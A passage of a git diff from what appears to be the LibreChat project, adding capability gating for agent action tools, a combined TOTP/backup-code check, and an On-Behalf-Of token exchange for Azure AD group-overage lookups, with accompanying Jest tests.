{Record>} [params.userMCPAuthMap] - User MCP auth map * @param {Object} [params.tool_resources] - Tool resources * @param {string|null} [params.streamId] - Stream ID for web search callbacks + * @param {boolean} [params.actionsEnabled] - Whether the actions capability is enabled * @returns {Promise<{ loadedTools: Array, configurable: Object }>} */ async function loadToolsForExecution({ @@ -1133,11 +1168,17 @@ async function loadToolsForExecution({ userMCPAuthMap, tool_resources, streamId = null, + actionsEnabled, }) { const appConfig = req.config; const allLoadedTools = []; const configurable = { userMCPAuthMap }; + if (actionsEnabled === undefined) { + const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent?.id); + actionsEnabled = enabledCapabilities.has(AgentCapabilities.actions); + } + const isToolSearch = toolNames.includes(AgentConstants.TOOL_SEARCH); const isPTC = toolNames.includes(AgentConstants.PROGRAMMATIC_TOOL_CALLING); @@ -1194,7 +1235,6 @@ async function loadToolsForExecution({ const actionToolNames = allToolNamesToLoad.filter((name) => name.includes(actionDelimiter)); const regularToolNames = allToolNamesToLoad.filter((name) => !name.includes(actionDelimiter)); - /** @type {Record} */ if (regularToolNames.length > 0) { const includesWebSearch = regularToolNames.includes(Tools.web_search); const webSearchCallbacks = includesWebSearch ? createOnSearchResults(res, streamId) : undefined; @@ -1225,7 +1265,7 @@ async function loadToolsForExecution({ } } - if (actionToolNames.length > 0 && agent) { + if (actionToolNames.length > 0 && agent && actionsEnabled) { const actionTools = await loadActionToolsForExecution({ req, res, @@ -1235,6 +1275,11 @@ async function loadToolsForExecution({ actionToolNames, }); allLoadedTools.push(...actionTools); + } else if (actionToolNames.length > 0 && agent && !actionsEnabled) { + logger.warn( + `[loadToolsForExecution] Capability "${AgentCapabilities.actions}" disabled. ` + + `Skipping action tool execution. User: ${req.user.id} | Agent: ${agent.id} | Tools: ${actionToolNames.join(', ')}`, + ); } if (isPTC && allLoadedTools.length > 0) { @@ -1280,12 +1325,20 @@ async function loadActionToolsForExecution({ } const processedActionSets = new Map(); - const domainMap = new Map(); + /** Maps both new and legacy normalized domains to their canonical (new) domain key */ + const normalizedToDomain = new Map(); const allowedDomains = appConfig?.actions?.allowedDomains; for (const action of actionSets) { const domain = await domainParser(action.metadata.domain, true); - domainMap.set(domain, action); + const normalizedDomain = domain.replace(domainSeparatorRegex, '_'); + normalizedToDomain.set(normalizedDomain, domain); + + const legacyDomain = legacyDomainEncode(action.metadata.domain); + const legacyNormalized = legacyDomain.replace(domainSeparatorRegex, '_'); + if (legacyNormalized !== normalizedDomain) { + normalizedToDomain.set(legacyNormalized, domain); + } const isDomainAllowed = await isActionDomainAllowed(action.metadata.domain, allowedDomains); if (!isDomainAllowed) { @@ -1334,16 +1387,15 @@ async function loadActionToolsForExecution({ functionSignatures, zodSchemas, encrypted, + legacyNormalized, }); } - const domainSeparatorRegex = new RegExp(actionDomainSeparator, 'g'); for (const toolName of actionToolNames) { let currentDomain = ''; - for (const domain of domainMap.keys()) { - const normalizedDomain = domain.replace(domainSeparatorRegex, '_'); + for (const [normalizedDomain, canonicalDomain] of normalizedToDomain.entries()) { if (toolName.includes(normalizedDomain)) { - currentDomain = domain; + currentDomain = canonicalDomain; break; } } @@ -1352,7 +1404,7 @@ async function loadActionToolsForExecution({ continue; } - const { action, encrypted, zodSchemas, requestBuilders, functionSignatures } = + const { action, encrypted, zodSchemas, requestBuilders, functionSignatures, legacyNormalized } = processedActionSets.get(currentDomain); const normalizedDomain = currentDomain.replace(domainSeparatorRegex, '_'); const functionName = toolName.replace(`${actionDelimiter}${normalizedDomain}`, ''); @@ -1361,6 +1413,25 @@ async function loadActionToolsForExecution({ const zodSchema = zodSchemas[functionName]; if (!requestBuilder) { + const legacyFnName = toolName.replace(`${actionDelimiter}${legacyNormalized}`, ''); + if (legacyFnName !== toolName && requestBuilders[legacyFnName]) { + const legacyTool = await createActionTool({ + userId: req.user.id, + res, + action, + streamId, + encrypted, + requestBuilder: requestBuilders[legacyFnName], + zodSchema: zodSchemas[legacyFnName], + name: toolName, + description: + functionSignatures.find((sig) => sig.name === legacyFnName)?.description ?? '', + useSSRFProtection: !Array.isArray(allowedDomains) || allowedDomains.length === 0, + }); + if (legacyTool) { + loadedActionTools.push(legacyTool); + } + } continue; } @@ -1395,4 +1466,5 @@ module.exports = { loadAgentTools, loadToolsForExecution, processRequiredActions, + resolveAgentCapabilities, }; diff --git a/api/server/services/__tests__/ToolService.spec.js b/api/server/services/__tests__/ToolService.spec.js index c44298b09c..a468a88eb3 100644 --- a/api/server/services/__tests__/ToolService.spec.js +++ b/api/server/services/__tests__/ToolService.spec.js @@ -1,19 +1,304 @@ const { + Tools, Constants, + EModelEndpoint, + actionDelimiter, AgentCapabilities, defaultAgentCapabilities, } = require('librechat-data-provider'); -/** - * Tests for ToolService capability checking logic. - * The actual loadAgentTools function has many dependencies, so we test - * the capability checking logic in isolation. - */ -describe('ToolService - Capability Checking', () => { +const mockGetEndpointsConfig = jest.fn(); +const mockGetMCPServerTools = jest.fn(); +const mockGetCachedTools = jest.fn(); +jest.mock('~/server/services/Config', () => ({ + getEndpointsConfig: (...args) => mockGetEndpointsConfig(...args), + getMCPServerTools: (...args) => mockGetMCPServerTools(...args), + getCachedTools: (...args) => mockGetCachedTools(...args), +})); + +const mockLoadToolDefinitions = jest.fn(); +const mockGetUserMCPAuthMap = jest.fn(); +jest.mock('@librechat/api', () => ({ + ...jest.requireActual('@librechat/api'), + loadToolDefinitions: (...args) => mockLoadToolDefinitions(...args), + getUserMCPAuthMap: (...args) => mockGetUserMCPAuthMap(...args), +})); + +const mockLoadToolsUtil = jest.fn(); +jest.mock('~/app/clients/tools/util', () => ({ + loadTools: (...args) => mockLoadToolsUtil(...args), +})); + +const mockLoadActionSets = jest.fn(); +jest.mock('~/server/services/Tools/credentials', () => ({ + loadAuthValues: jest.fn().mockResolvedValue({}), +})); +jest.mock('~/server/services/Tools/search', () => ({ + createOnSearchResults: jest.fn(), +})); +jest.mock('~/server/services/Tools/mcp', () => ({ + reinitMCPServer: jest.fn(), +})); +jest.mock('~/server/services/Files/process', () => ({ + processFileURL: jest.fn(), + uploadImageBuffer: jest.fn(), +})); +jest.mock('~/app/clients/tools/util/fileSearch', () => ({ + primeFiles: jest.fn().mockResolvedValue({}), +})); +jest.mock('~/server/services/Files/Code/process', () => ({ + primeFiles: jest.fn().mockResolvedValue({}), +})); +jest.mock('../ActionService', () => ({ + loadActionSets: (...args) => mockLoadActionSets(...args), + decryptMetadata: jest.fn(), + createActionTool: jest.fn(), + domainParser: jest.fn(), +})); +jest.mock('~/server/services/Threads', () => ({ + recordUsage: jest.fn(), +})); +jest.mock('~/models', () => ({ + findPluginAuthsByKeys: jest.fn(), +})); +jest.mock('~/config', () => ({ + getFlowStateManager: jest.fn(() => ({})), +})); +jest.mock('~/cache', () => ({ + getLogStores: jest.fn(() => ({})), +})); + +const { + loadAgentTools, + loadToolsForExecution, + resolveAgentCapabilities, +} = require('../ToolService'); + +function createMockReq(capabilities) { + return { + user: { id: 'user_123' }, + config: { + endpoints: { + [EModelEndpoint.agents]: { + capabilities, + }, + }, + }, + }; +} + +function createEndpointsConfig(capabilities) { + return { + [EModelEndpoint.agents]: { capabilities }, + }; +} + +describe('ToolService - Action Capability Gating', () => { + beforeEach(() => { + jest.clearAllMocks(); + mockLoadToolDefinitions.mockResolvedValue({ + toolDefinitions: [], + toolRegistry: new Map(), + hasDeferredTools: false, + }); + mockLoadToolsUtil.mockResolvedValue({ loadedTools: [], toolContextMap: {} }); + mockLoadActionSets.mockResolvedValue([]); + }); + + describe('resolveAgentCapabilities', () => { + it('should return capabilities from endpoints config', async () => { + const capabilities = [AgentCapabilities.tools, AgentCapabilities.actions]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + const result = await resolveAgentCapabilities(req, req.config, 'agent_123'); + + expect(result).toBeInstanceOf(Set); + expect(result.has(AgentCapabilities.tools)).toBe(true); + expect(result.has(AgentCapabilities.actions)).toBe(true); + expect(result.has(AgentCapabilities.web_search)).toBe(false); + }); + + it('should fall back to default capabilities for ephemeral agents with empty config', async () => { + const req = createMockReq(defaultAgentCapabilities); + mockGetEndpointsConfig.mockResolvedValue({}); + + const result = await resolveAgentCapabilities(req, req.config, Constants.EPHEMERAL_AGENT_ID); + + for (const cap of defaultAgentCapabilities) { + expect(result.has(cap)).toBe(true); + } + }); + + it('should return empty set when no capabilities and not ephemeral', async () => { + const req = createMockReq([]); + mockGetEndpointsConfig.mockResolvedValue({}); + + const result = await resolveAgentCapabilities(req, req.config, 'agent_123'); + + expect(result.size).toBe(0); + }); + }); + + describe('loadAgentTools (definitionsOnly=true) — action tool filtering', () => { + const actionToolName = `get_weather${actionDelimiter}api_example_com`; + const regularTool = 'calculator'; + + it('should exclude action tools from definitions when actions capability is disabled', async () => { + const capabilities = [AgentCapabilities.tools, AgentCapabilities.web_search]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + await loadAgentTools({ + req, + res: {}, + agent: { id: 'agent_123', tools: [regularTool, actionToolName] }, + definitionsOnly: true, + }); + + expect(mockLoadToolDefinitions).toHaveBeenCalledTimes(1); + const [callArgs] = mockLoadToolDefinitions.mock.calls[0]; + expect(callArgs.tools).toContain(regularTool); + expect(callArgs.tools).not.toContain(actionToolName); + }); + + it('should include action tools in definitions when actions capability is enabled', async () => { + const capabilities = [AgentCapabilities.tools, AgentCapabilities.actions]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + await loadAgentTools({ + req, + res: {}, + agent: { id: 'agent_123', tools: [regularTool, actionToolName] }, + definitionsOnly: true, + }); + + expect(mockLoadToolDefinitions).toHaveBeenCalledTimes(1); + const [callArgs] = mockLoadToolDefinitions.mock.calls[0]; + expect(callArgs.tools).toContain(regularTool); + expect(callArgs.tools).toContain(actionToolName); + }); + + it('should return actionsEnabled in the result', async () => { + const capabilities = [AgentCapabilities.tools]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + const result = await loadAgentTools({ + req, + res: {}, + agent: { id: 'agent_123', tools: [regularTool] }, + definitionsOnly: true, + }); + + expect(result.actionsEnabled).toBe(false); + }); + }); + + describe('loadAgentTools (definitionsOnly=false) — action tool filtering', () => { + const actionToolName = `get_weather${actionDelimiter}api_example_com`; + const regularTool = 'calculator'; + + it('should not load action sets when actions capability is disabled', async () => { + const capabilities = [AgentCapabilities.tools, AgentCapabilities.web_search]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + await loadAgentTools({ + req, + res: {}, + agent: { id: 'agent_123', tools: [regularTool, actionToolName] }, + definitionsOnly: false, + }); + + expect(mockLoadActionSets).not.toHaveBeenCalled(); + }); + + it('should load action sets when actions capability is enabled and action tools present', async () => { + const capabilities = [AgentCapabilities.tools, AgentCapabilities.actions]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + await loadAgentTools({ + req, + res: {}, + agent: { id: 'agent_123', tools: [regularTool, actionToolName] }, + definitionsOnly: false, + }); + + expect(mockLoadActionSets).toHaveBeenCalledWith({ agent_id: 'agent_123' }); + }); + }); + + describe('loadToolsForExecution — action tool gating', () => { + const actionToolName = `get_weather${actionDelimiter}api_example_com`; + const regularTool = Tools.web_search; + + it('should skip action tool loading when actionsEnabled=false', async () => { + const req = createMockReq([]); + req.config = {}; + + const result = await loadToolsForExecution({ + req, + res: {}, + agent: { id: 'agent_123' }, + toolNames: [regularTool, actionToolName], + actionsEnabled: false, + }); + + expect(mockLoadActionSets).not.toHaveBeenCalled(); + expect(result.loadedTools).toBeDefined(); + }); + + it('should load action tools when actionsEnabled=true', async () => { + const req = createMockReq([AgentCapabilities.actions]); + req.config = {}; + + await loadToolsForExecution({ + req, + res: {}, + agent: { id: 'agent_123' }, + toolNames: [actionToolName], + actionsEnabled: true, + }); + + expect(mockLoadActionSets).toHaveBeenCalledWith({ agent_id: 'agent_123' }); + }); + + it('should resolve actionsEnabled from capabilities when not explicitly provided', async () => { + const capabilities = [AgentCapabilities.tools]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + await loadToolsForExecution({ + req, + res: {}, + agent: { id: 'agent_123' }, + toolNames: [actionToolName], + }); + + expect(mockGetEndpointsConfig).toHaveBeenCalled(); + expect(mockLoadActionSets).not.toHaveBeenCalled(); + }); + + it('should not call loadActionSets when there are no action tools', async () => { + const req = createMockReq([AgentCapabilities.actions]); + req.config = {}; + + await loadToolsForExecution({ + req, + res: {}, + agent: { id: 'agent_123' }, + toolNames: [regularTool], + actionsEnabled: true, + }); + + expect(mockLoadActionSets).not.toHaveBeenCalled(); + }); + }); + describe('checkCapability logic', () => { - /** - * Simulates the checkCapability function from loadAgentTools - */ const createCheckCapability = (enabledCapabilities, logger = { warn: jest.fn() }) => { return (capability) => { const enabled = enabledCapabilities.has(capability); @@ -124,10 +409,6 @@ describe('ToolService - Capability Checking', () => { }); describe('userMCPAuthMap gating', () => { - /** - * Simulates the guard condition used in both loadToolDefinitionsWrapper - * and loadAgentTools to decide whether getUserMCPAuthMap should be called. - */ const shouldFetchMCPAuth = (tools) => tools?.some((t) => t.includes(Constants.mcp_delimiter)) ?? false; @@ -178,20 +459,17 @@ describe('ToolService - Capability Checking', () => { return (capability) => enabledCapabilities.has(capability); }; - // When deferred_tools is in capabilities const withDeferred = new Set([AgentCapabilities.deferred_tools, AgentCapabilities.tools]); const checkWithDeferred = createCheckCapability(withDeferred); expect(checkWithDeferred(AgentCapabilities.deferred_tools)).toBe(true); - // When deferred_tools is NOT in capabilities const withoutDeferred = new Set([AgentCapabilities.tools, AgentCapabilities.actions]); const checkWithoutDeferred = createCheckCapability(withoutDeferred); expect(checkWithoutDeferred(AgentCapabilities.deferred_tools)).toBe(false); }); it('should use defaultAgentCapabilities when no capabilities configured', () => { - // Simulates the fallback behavior in loadAgentTools - const endpointsConfig = {}; // No capabilities configured + const endpointsConfig = {}; const enabledCapabilities = new Set( endpointsConfig?.capabilities ?? defaultAgentCapabilities, ); diff --git a/api/server/services/twoFactorService.js b/api/server/services/twoFactorService.js index cce24e2322..313c557133 100644 --- a/api/server/services/twoFactorService.js +++ b/api/server/services/twoFactorService.js @@ -153,9 +153,11 @@ const generateBackupCodes = async (count = 10) => { * @param {Object} params * @param {Object} params.user * @param {string} params.backupCode + * @param {boolean} [params.persist=true] - Whether to persist the used-mark to the database. + * Pass `false` when the caller will immediately overwrite `backupCodes` (e.g. re-enrollment). * @returns {Promise} */ -const verifyBackupCode = async ({ user, backupCode }) => { +const verifyBackupCode = async ({ user, backupCode, persist = true }) => { if (!backupCode || !user || !Array.isArray(user.backupCodes)) { return false; } @@ -165,17 +167,50 @@ const verifyBackupCode = async ({ user, backupCode }) => { (codeObj) => codeObj.codeHash === hashedInput && !codeObj.used, ); - if (matchingCode) { + if (!matchingCode) { + return false; + } + + if (persist) { const updatedBackupCodes = user.backupCodes.map((codeObj) => codeObj.codeHash === hashedInput && !codeObj.used ? { ...codeObj, used: true, usedAt: new Date() } : codeObj, ); - // Update the user record with the marked backup code. await updateUser(user._id, { backupCodes: updatedBackupCodes }); - return true; } - return false; + return true; +}; + +/** + * Verifies a user's identity via TOTP token or backup code. + * @param {Object} params + * @param {Object} params.user - The user document (must include totpSecret and backupCodes). + * @param {string} [params.token] - A 6-digit TOTP token. + * @param {string} [params.backupCode] - An 8-character backup code. + * @param {boolean} [params.persistBackupUse=true] - Whether to mark the backup code as used in the DB. + * @returns {Promise<{ verified: boolean, status?: number, message?: string }>} + */ +const verifyOTPOrBackupCode = async ({ user, token, backupCode, persistBackupUse = true }) => { + if (!token && !backupCode) { + return { verified: false, status: 400 }; + } + + if (token) { + const secret = await getTOTPSecret(user.totpSecret); + if (!secret) { + return { verified: false, status: 400, message: '2FA secret is missing or corrupted' }; + } + const ok = await verifyTOTP(secret, token); + return ok + ? { verified: true } + : { verified: false, status: 401, message: 'Invalid token or backup code' }; + } + + const ok = await verifyBackupCode({ user, backupCode, persist: persistBackupUse }); + return ok + ? { verified: true } + : { verified: false, status: 401, message: 'Invalid token or backup code' }; }; /** @@ -213,11 +248,12 @@ const generate2FATempToken = (userId) => { }; module.exports = { - generateTOTPSecret, - generateTOTP, - verifyTOTP, + verifyOTPOrBackupCode, + generate2FATempToken, generateBackupCodes, + generateTOTPSecret, verifyBackupCode, getTOTPSecret, - generate2FATempToken, + generateTOTP, + verifyTOTP, }; diff --git a/api/server/utils/import/fork.js b/api/server/utils/import/fork.js index c4ce8cb5d4..f896de378c 100644 --- a/api/server/utils/import/fork.js +++ b/api/server/utils/import/fork.js @@ -358,16 +358,15 @@ function splitAtTargetLevel(messages, targetMessageId) { * @param {object} params - The parameters for duplicating the conversation. * @param {string} params.userId - The ID of the user duplicating the conversation. * @param {string} params.conversationId - The ID of the conversation to duplicate. + * @param {string} [params.title] - Optional title override for the duplicate. * @returns {Promise<{ conversation: TConversation, messages: TMessage[] }>} The duplicated conversation and messages. */ -async function duplicateConversation({ userId, conversationId }) { - // Get original conversation +async function duplicateConversation({ userId, conversationId, title }) { const originalConvo = await getConvo(userId, conversationId); if (!originalConvo) { throw new Error('Conversation not found'); } - // Get original messages const originalMessages = await getMessages({ user: userId, conversationId, @@ -383,14 +382,11 @@ async function duplicateConversation({ userId, conversationId }) { cloneMessagesWithTimestamps(messagesToClone, importBatchBuilder); - const result = importBatchBuilder.finishConversation( - originalConvo.title, - new Date(), - originalConvo, - ); + const duplicateTitle = title || originalConvo.title; + const result = importBatchBuilder.finishConversation(duplicateTitle, new Date(), originalConvo); await importBatchBuilder.saveBatch(); logger.debug( - `user: ${userId} | New conversation "${originalConvo.title}" duplicated from conversation ID ${conversationId}`, + `user: ${userId} | New conversation "${duplicateTitle}" duplicated from conversation ID ${conversationId}`, ); const conversation = await getConvo(userId, result.conversation.conversationId); diff --git a/api/server/utils/import/importConversations.js b/api/server/utils/import/importConversations.js index d9e4d4332d..e56176c609 100644 --- a/api/server/utils/import/importConversations.js +++ b/api/server/utils/import/importConversations.js @@ -1,7 +1,10 @@ const fs = require('fs').promises; +const { resolveImportMaxFileSize } = require('@librechat/api'); const { logger } = require('@librechat/data-schemas'); const { getImporter } = require('./importers'); +const maxFileSize = resolveImportMaxFileSize(); + /** * Job definition for importing a conversation. * @param {{ filepath, requestUserId }} job - The job object. @@ -11,11 +14,10 @@ const importConversations = async (job) => { try { logger.debug(`user: ${requestUserId} | Importing conversation(s) from file...`); - /* error if file is too large */ const fileInfo = await fs.stat(filepath); - if (fileInfo.size > process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES) { + if (fileInfo.size > maxFileSize) { throw new Error( - `File size is ${fileInfo.size} bytes. It exceeds the maximum limit of ${process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES} bytes.`, + `File size is ${fileInfo.size} bytes. It exceeds the maximum limit of ${maxFileSize} bytes.`, ); } diff --git a/api/strategies/openidStrategy.js b/api/strategies/openidStrategy.js index 0ebdcb04e1..7c43358297 100644 --- a/api/strategies/openidStrategy.js +++ b/api/strategies/openidStrategy.js @@ -315,24 +315,85 @@ function convertToUsername(input, defaultValue = '') { return defaultValue; } +/** + * Exchange the access token for a Graph-scoped token using the On-Behalf-Of (OBO) flow. + * + * The original access token has the app's own audience (api://), which Microsoft Graph + * rejects. This exchange produces a token with audience https://graph.microsoft.com and the + * minimum delegated scope (User.Read) required by /me/getMemberObjects. + * + * Uses a dedicated cache key (`${sub}:overage`) to avoid collisions with other OBO exchanges + * in the codebase (userinfo, Graph principal search). + * + * @param {string} accessToken - The original access token from the OpenID tokenset + * @param {string} sub - The subject identifier for cache keying + * @returns {Promise} A Graph-scoped access token + * @see https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-on-behalf-of-flow + */ +async function exchangeTokenForOverage(accessToken, sub) { + if (!openidConfig) { + throw new Error('[openidStrategy] OpenID config not initialized; cannot exchange OBO token'); + } + + const tokensCache = getLogStores(CacheKeys.OPENID_EXCHANGED_TOKENS); + const cacheKey = `${sub}:overage`; + + const cached = await tokensCache.get(cacheKey); + if (cached?.access_token) { + logger.debug('[openidStrategy] Using cached Graph token for overage resolution'); + return cached.access_token; + } + + const grantResponse = await client.genericGrantRequest( + openidConfig, + 'urn:ietf:params:oauth:grant-type:jwt-bearer', + { + scope: 'https://graph.microsoft.com/User.Read', + assertion: accessToken, + requested_token_use: 'on_behalf_of', + }, + ); + + if (!grantResponse.access_token) { + throw new Error( + '[openidStrategy] OBO exchange succeeded but returned no access_token; cannot call Graph API', + ); + } + + const ttlMs = + Number.isFinite(grantResponse.expires_in) && grantResponse.expires_in > 0 + ? grantResponse.expires_in * 1000 + : 3600 * 1000; + + await tokensCache.set(cacheKey, { access_token: grantResponse.access_token }, ttlMs); + + return grantResponse.access_token; +} + /** * Resolve Azure AD groups when group overage is in effect (groups moved to _claim_names/_claim_sources). * * NOTE: Microsoft recommends treating _claim_names/_claim_sources as a signal only and using Microsoft Graph * to resolve group membership instead of calling the endpoint in _claim_sources directly. * - * @param {string} accessToken - Access token with Microsoft Graph permissions + * Before calling Graph, the access token is exchanged via the OBO flow to obtain a token with the + * correct audience (https://graph.microsoft.com) and User.Read scope. + * + * @param {string} accessToken - Access token from the OpenID tokenset (app audience) + * @param {string} sub - The subject identifier of the user (for OBO exchange and cache keying) * @returns {Promise} Resolved group IDs or null on failure * @see https://learn.microsoft.com/en-us/entra/identity-platform/access-token-claims-reference#groups-overage-claim * @see https://learn.microsoft.com/en-us/graph/api/directoryobject-getmemberobjects */ -async function resolveGroupsFromOverage(accessToken) { +async function resolveGroupsFromOverage(accessToken, sub) { try { if (!accessToken) { logger.error('[openidStrategy] Access token missing; cannot resolve group overage'); return null; } + const graphToken = await exchangeTokenForOverage(accessToken, sub); + // Use /me/getMemberObjects so least-privileged delegated permission User.Read is sufficient // when resolving the signed-in user's group membership. const url = 'https://graph.microsoft.com/v1.0/me/getMemberObjects'; @@ -344,7 +405,7 @@ async function resolveGroupsFromOverage(accessToken) { const fetchOptions = { method: 'POST', headers: { - Authorization: `Bearer ${accessToken}`, + Authorization: `Bearer ${graphToken}`, 'Content-Type': 'application/json', }, body: JSON.stringify({ securityEnabledOnly: false }), @@ -364,6 +425,7 @@ async function resolveGroupsFromOverage(accessToken) { } const data = await response.json(); + const values = Array.isArray(data?.value) ? data.value : null; if (!values) { logger.error( @@ -432,6 +494,8 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) { const fullName = getFullName(userinfo); const requiredRole = process.env.OPENID_REQUIRED_ROLE; + let resolvedOverageGroups = null; + if (requiredRole) { const requiredRoles = requiredRole .split(',') @@ -451,19 +515,21 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) { // Handle Azure AD group overage for ID token groups: when hasgroups or _claim_* indicate overage, // resolve groups via Microsoft Graph instead of relying on token group values. + const hasOverage = + decodedToken?.hasgroups || + (decodedToken?._claim_names?.groups && + decodedToken?._claim_sources?.[decodedToken._claim_names.groups]); + if ( - !Array.isArray(roles) && - typeof roles !== 'string' && requiredRoleTokenKind === 'id' && requiredRoleParameterPath === 'groups' && decodedToken && - (decodedToken.hasgroups || - (decodedToken._claim_names?.groups && - decodedToken._claim_sources?.[decodedToken._claim_names.groups])) + hasOverage ) { - const overageGroups = await resolveGroupsFromOverage(tokenset.access_token); + const overageGroups = await resolveGroupsFromOverage(tokenset.access_token, claims.sub); if (overageGroups) { roles = overageGroups; + resolvedOverageGroups = overageGroups; } } @@ -550,7 +616,25 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) { throw new Error('Invalid admin role token kind'); } - const adminRoles = get(adminRoleObject, adminRoleParameterPath); + let adminRoles = get(adminRoleObject, adminRoleParameterPath); + + // Handle Azure AD group overage for admin role when using ID token groups + if (adminRoleTokenKind === 'id' && adminRoleParameterPath === 'groups' && adminRoleObject) { + const hasAdminOverage = + adminRoleObject.hasgroups || + (adminRoleObject._claim_names?.groups && + adminRoleObject._claim_sources?.[adminRoleObject._claim_names.groups]); + + if (hasAdminOverage) { + const overageGroups = + resolvedOverageGroups || + (await resolveGroupsFromOverage(tokenset.access_token, claims.sub)); + if (overageGroups) { + adminRoles = overageGroups; + } + } + } + let adminRoleValues = []; if (Array.isArray(adminRoles)) { adminRoleValues = adminRoles; diff --git a/api/strategies/openidStrategy.spec.js b/api/strategies/openidStrategy.spec.js index 485b77829e..16fa548a59 100644 --- a/api/strategies/openidStrategy.spec.js +++ b/api/strategies/openidStrategy.spec.js @@ -64,6 +64,10 @@ jest.mock('openid-client', () => { // Only return additional properties, but don't override any claims return Promise.resolve({}); }), + genericGrantRequest: jest.fn().mockResolvedValue({ + access_token: 'exchanged_graph_token', + expires_in: 3600, + }), customFetch: Symbol('customFetch'), }; }); @@ -730,7 +734,7 @@ describe('setupOpenId', () => { expect.objectContaining({ method: 'POST', headers: expect.objectContaining({ - Authorization: `Bearer ${tokenset.access_token}`, + Authorization: 'Bearer exchanged_graph_token', }), }), ); @@ -745,6 +749,313 @@ describe('setupOpenId', () => { ); }); + describe('OBO token exchange for overage', () => { + it('exchanges access token via OBO before calling Graph API', async () => { + const openidClient = require('openid-client'); + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required'] }), + }); + + await validate(tokenset); + + expect(openidClient.genericGrantRequest).toHaveBeenCalledWith( + expect.anything(), + 'urn:ietf:params:oauth:grant-type:jwt-bearer', + expect.objectContaining({ + scope: 'https://graph.microsoft.com/User.Read', + assertion: tokenset.access_token, + requested_token_use: 'on_behalf_of', + }), + ); + + expect(undici.fetch).toHaveBeenCalledWith( + 'https://graph.microsoft.com/v1.0/me/getMemberObjects', + expect.objectContaining({ + headers: expect.objectContaining({ + Authorization: 'Bearer exchanged_graph_token', + }), + }), + ); + }); + + it('caches the exchanged token and reuses it on subsequent calls', async () => { + const openidClient = require('openid-client'); + const getLogStores = require('~/cache/getLogStores'); + const mockSet = jest.fn(); + const mockGet = jest + .fn() + .mockResolvedValueOnce(undefined) + .mockResolvedValueOnce({ access_token: 'exchanged_graph_token' }); + getLogStores.mockReturnValue({ get: mockGet, set: mockSet }); + + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required'] }), + }); + + // First call: cache miss → OBO exchange → cache set + await validate(tokenset); + expect(mockSet).toHaveBeenCalledWith( + '1234:overage', + { access_token: 'exchanged_graph_token' }, + 3600000, + ); + expect(openidClient.genericGrantRequest).toHaveBeenCalledTimes(1); + + // Second call: cache hit → no new OBO exchange + openidClient.genericGrantRequest.mockClear(); + await validate(tokenset); + expect(openidClient.genericGrantRequest).not.toHaveBeenCalled(); + }); + }); + + describe('admin role group overage', () => { + it('resolves admin groups via Graph when overage is detected for admin role', async () => { + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required', 'admin-group-id'] }), + }); + + const { user } = await validate(tokenset); + + expect(user.role).toBe('ADMIN'); + }); + + it('does not grant admin when overage groups do not contain admin role', async () => { + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required', 'other-group'] }), + }); + + const { user } = await validate(tokenset); + + expect(user).toBeTruthy(); + expect(user.role).toBeUndefined(); + }); + + it('reuses already-resolved overage groups for admin role check (no duplicate Graph call)', async () => { + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + process.env.OPENID_ADMIN_ROLE = 